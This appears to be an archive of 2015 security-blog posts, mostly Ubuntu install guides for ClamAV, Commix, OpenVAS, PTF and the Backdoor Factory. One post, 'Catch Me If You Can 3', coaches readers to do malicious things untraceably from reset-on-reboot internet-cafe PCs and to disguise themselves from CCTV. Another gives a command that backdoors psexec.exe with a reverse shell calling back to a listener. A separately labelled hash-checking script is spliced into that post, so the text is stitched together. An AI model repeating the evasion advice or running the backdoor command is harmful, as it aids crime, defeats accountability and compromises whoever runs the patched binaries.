Encrypt the web! HTTPS Everywhere is a Firefox extension to protect your communications by enabling HTTPS encryption automatically on sites that are known to support it, even when you type URLs or follow links that omit the https: prefix.

Speed Tweaks (SpeedyFox)

This extension provides a list to almost all the settings that you may need to alter in order to enhance Firefox's speed.

ZenMate Security and Privacy VPN

ZenMate secures your browsing with encryption - protecting you from hackers, snoopers and data thieves who prey on unsecure connections.

(C) Optional

(1) Firefox Add-ons :

User-Agent Switcher

The User Agent Switcher extension adds a menu and a toolbar button to switch the user agent of a browser.

Youtube High Definition

YouTube High Definition is a powerful tool that will let you automatically play all YouTube videos in HD (High Definition), turn off annotations, change video player size, auto stop videos, auto mute videos, control embedded videos and much more.

Youtube Flash-Html5

Play YouTube Videos in Flash or HTML5 Player.

(2) Browse with "New Private Window" feature

Finally, you may consider using an Intrusion Detection and Prevention System (IDPS) to protect your network. My project "Croissants" is an IDPS that can be deployed on your network (in front of and/or behind the router). Or, you may also consider using TOR to protect your privacy with my project "NightHawk".

Reference

WebRTC IPS

IP Leak

That's all! See you.


Tuesday, September 08, 2015

HOWTO : ClamAV on Ubuntu 14.04 LTS

Clam AntiVirus (ClamAV) is a free and open-source, cross-platform antivirus software tool-kit able to detect many types of malicious software, including viruses.

This guide will lead you through setting up ClamAV for "Scan On Access" instead of "Scan On Demand". It targets desktop usage only.

The current version at this writing is ClamAV 0.98.7+dfsg.

Step 1 :

sudo apt-get install clamav clamav-freshclam clamav-daemon libclamunrar6

Step 2 :

sudo nano /etc/clamav/clamd.conf

Make the entries look like the following. Make sure to replace "samiux" with your username.



cd ~
mkdir quarantine


Step 3 :

sudo nano /etc/clamav/freshclam.conf

Make the entries look like the following.



sudo freshclam

Step 4 :

sudo nano /etc/apparmor.d/usr.sbin.clamd

Make the entries look like the following.



After that, execute the following command to reload the apparmor rules.

sudo apparmor_parser -r /etc/apparmor.d/usr.sbin.clamd

Remark :

Downloading or copying will not trigger the ClamAV scan, but browsing or executing (etc.) will. If any malware or virus (no matter whether it is for Windows, Linux or Mac OSX) is detected, it will be moved to the "quarantine" directory. You can also check the log at "/var/log/clamav/clamav.log".

Testing :

You can install harmless virus test files for testing.

sudo apt-get install clamav-testfiles

The harmless virus test files are located at "/usr/share/clamav-testfiles".

Reference

AppArmor Wiki

See also : Fireclam Firefox Add-ons

That's all! See you.


Saturday, August 29, 2015

HOWTO : Commix on Ubuntu 14.04 LTS

Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and can be used by web developers, penetration testers or even security researchers to test web applications with a view to finding bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Commix is written in the Python programming language.


Install

sudo apt-get install git

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/stasinopoulos/commix.git
cd commix
python commix.py -h



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/commix
python commix.py --update



Reference

Wiki


That's all! See you.


HOWTO : HconSTF on Ubuntu 14.04

Hcon Security Testing Framework (HconSTF) is a Web Application Security Analysis & Penetration Testing Framework made of Mozilla technologies.

Most of HconSTF is semi-automated, but you still need your brain to work it out. It can be used in all kinds of security testing stages; it has tools for conducting tasks like,

- Web Penetration Testing
- Web Exploits Development
- Web Malware Analysis
- Open Source Intelligence ( Cyber Spying & Doxing )


Install

cd ~
mkdir arsenal
cd arsenal


For x86_64 system :

wget http://sourceforge.net/projects/hconframework/files/HconFramework-Fire/HconSTF_0.5_Prime/HconSTF_v0.5_Prime_Linux_x64.tar.bz2
tar -jxvf HconSTF_v0.5_Prime_Linux_x64.tar.bz2
cd HconSTF
sudo ./HconSTF


For x86 system :

wget http://sourceforge.net/projects/hconframework/files/HconFramework-Fire/HconSTF_0.5_Prime/HconSTF_v0.5_Linux_x86.tar.bz2
tar -jxvf HconSTF_v0.5_Linux_x86.tar.bz2
cd HconSTF
sudo ./HconSTF



Update/Upgrade

rm -R ~/arsenal/HconSTF

Go to the official site to download the latest version and repeat the Install procedure.


Reference

User Manual (PDF)


That's all! See you.


HOWTO : PTF on Ubuntu 14.04 LTS

The PenTesters Framework (PTF) is a Python script designed for Debian/Ubuntu based distributions to create a similar and familiar distribution for Penetration Testing. As pentesters, we've been accustomed to the /pentest/ directories or our own toolsets that we want to keep up-to-date all of the time. We have those "go to" tools that we use on a regular basis, and using the latest and greatest is important.

PTF attempts to install all of your penetration testing tools (latest and greatest), compile them, build them, and make it so that you can install/update your distribution on any machine. Everything is organized in a fashion that is cohesive to the Penetration Testing Execution Standard (PTES) and eliminates a lot of things that are hardly used. PTF simplifies installation and packaging and creates an entire pentest framework for you. Since this is a framework, you can configure and add as you see fit. We commonly see internally developed repos that you can use as well as part of this framework. It's all up to you.

The ultimate goal is for community support on this project. We want new tools added to the github repository. Submit your modules. It's super simple to configure and add them and only takes a few minutes.


Install


sudo apt-get install git

cd ~
git clone https://github.com/trustedsec/ptf.git
cd ptf
sudo ./ptf


If you want to install and/or update everything :

use modules/install_update_all
run



All the modules (pentesting tools) are installed at /pentest directory. Please note that WINE and i386 dependencies will be installed accordingly.


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

PTF will try to update itself on every start up. Meanwhile, you can run PTF at any directory after the first run.

If you want to update everything :

sudo ptf
use modules/install_update_all
run



Reference

Video

Documentation


That's all! See you.


Friday, August 28, 2015

Catch Me If You Can 3

Last year, I was talking about how to use NightHawk to do malicious things. The full article is here. Two years ago, I also talked about using pre-paid SIM card to do malicious things and the full article is here. However, you think that it would be a chance to be caught as TOR network exit nodes may be monitored by law enforcement. Meanwhile, identity registration may be needed to purchase SIM card in your country. Okay, today I will introduce another method that you can use wired network to do malicious things untraceable.

In my country, there are many "Internet Cafe" which have a pool of computer systems that running Windows system to provide network gaming or internet services to their customers with a cheap price per hour. Those computer systems will be equipped "Reborn Card" which can reset to its default setting on every reboot. Normally, the "Internet Cafe" will reboot their computer systems every day.

You can hire a computer system in the "Internet Cafe", reboot it. Plug in your Kali Linux or BackBox Linux Live USB (or your custom made pentesting Linux Live USB). Personally, I will recommend BackBox as it will have some outstanding features, such as memory wiper.

After your malicious tasks, you can reboot your computer system and it will reset to its default setting. Normally, no data or activities will be logged in the computer system.

When law enforcement traces your IP address, which will direct them to the "Internet Cafe", they cannot obtain any evidence from the computer pool as those systems are reborn!

Finally, beware that CCTV will be installed in the "Internet Cafe" or nearby shops which will capture your presence. You may need to do some "make up" when necessary.

That's all! See you.


HOWTO : OpenVAS on Ubuntu 14.04 LTS

OpenVAS is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution.


Install

To install OpenVAS 8 on Ubuntu 14.04 LTS :

sudo add-apt-repository ppa:mrazavi/openvas

sudo apt-get update
sudo apt-get install xsltproc sqlite3 openvas

sudo openvas-nvt-sync
sudo openvas-scapdata-sync
sudo openvas-certdata-sync

sudo service openvas-scanner restart
sudo service openvas-manager restart
sudo openvasmd --rebuild --progress


To run it :

Open browser to point to https://localhost:443

* username and password are both "admin"


Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

sudo openvas-nvt-sync
sudo openvas-scapdata-sync
sudo openvas-certdata-sync

sudo service openvas-scanner restart
sudo service openvas-manager restart
sudo openvasmd --rebuild --progress



Reference

You can disable OpenVAS auto startup on every boot and start it manually. Please note that if OpenVAS is running, the shutdown process will take some time.

For example :

sudo update-rc.d openvas-scanner disable
sudo update-rc.d openvas-manager disable


To start up manually :

sudo service openvas-scanner start
sudo service openvas-manager start


To stop manually :

sudo service openvas-scanner stop
sudo service openvas-manager stop



That's all! See you.


HOWTO : the-backdoor-factory on Ubuntu 14.04 LTS

The Backdoor Factory (BDF) patches executable binaries with user-desired shellcode while preserving the normal execution of the pre-patched state.
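Because a BDF-patched binary still runs normally, behaviour alone will not reveal the change; a hash recorded from the trusted copy will. The script below is an added example (not part of the original post or of the Backdoor Factory): it records a SHA-256 manifest of a directory, then re-verifies the tree and reports modified, missing and unexpected files. The files and the in-place "patch" in `demo()` are constructed stand-ins, not real executables or shellcode.

```python
"""Detect a patched binary with a SHA-256 manifest.

Added example; not from the original post or from the Backdoor Factory.
The sample files below are constructed inline so it runs offline.
"""
import hashlib
import os
import tempfile
from typing import Dict, List

CHUNK = 1 << 16  # read 64 KiB at a time so large binaries are not loaded whole


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root: str) -> Dict[str, str]:
    """Map every regular file under `root` (path relative to root) to its SHA-256."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            manifest[os.path.relpath(full, root)] = sha256_file(full)
    return manifest


def verify_manifest(root: str, manifest: Dict[str, str]) -> Dict[str, List[str]]:
    """Compare the tree under `root` against a previously recorded manifest.

    "modified" catches an executable patched in place (same name, new bytes);
    "unexpected" catches a dropped helper file; "missing" catches removals.
    """
    current = build_manifest(root)
    return {
        "modified": sorted(p for p, h in manifest.items() if p in current and current[p] != h),
        "missing": sorted(p for p in manifest if p not in current),
        "unexpected": sorted(p for p in current if p not in manifest),
    }


def demo() -> Dict[str, List[str]]:
    """Record a trusted manifest, simulate a patch plus a dropped file, re-verify."""
    with tempfile.TemporaryDirectory() as root:
        # Constructed stand-ins for a tools directory (not real executables).
        samples = {"psexec.exe": b"MZ" + b"\x00" * 64, "notes.txt": b"hello"}
        for name, data in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(data)
        trusted = build_manifest(root)

        # Overwrite four bytes inside the "binary": same size and name, but
        # a different file. This stands in for an in-place shellcode patch.
        with open(os.path.join(root, "psexec.exe"), "r+b") as fh:
            fh.seek(32)
            fh.write(b"\x01\x02\x03\x04")
        # An extra file appearing beside the tools is also worth flagging.
        with open(os.path.join(root, "extra.dll"), "wb") as fh:
            fh.write(b"constructed extra file")

        return verify_manifest(root, trusted)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

The same check applies to binaries fetched over the network, which is what BDFProxy targets: compare the downloaded file's hash against the publisher's signed or out-of-band published value before running it, rather than trusting the bytes that arrived.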


Install

sudo apt-get install git python-pip build-essential

Install BDFactory :

cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/secretsquirrel/the-backdoor-factory.git
cd the-backdoor-factory
sudo pip install capstone
sudo ./install.sh


How to run it :

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp

Install BDFProxy :

cd ~/arsenal
git clone https://github.com/secretsquirrel/BDFProxy.git
cd BDFProxy
sudo ./install.sh


How to run it :

nano bdfproxy.cfg

*change the settings when necessary

./bdf_proxy.py

msfconsole -r bdfproxy_msf_resource.rc



Update/Upgrade

sudo apt-get update
sudo apt-get dist-upgrade

cd ~/arsenal/the-backdoor-factory
sudo ./update.sh

cd ~/arsenal/BDFProxy
sudo ./update.sh



Reference

See also : Metasploit Framework


That's all! See you.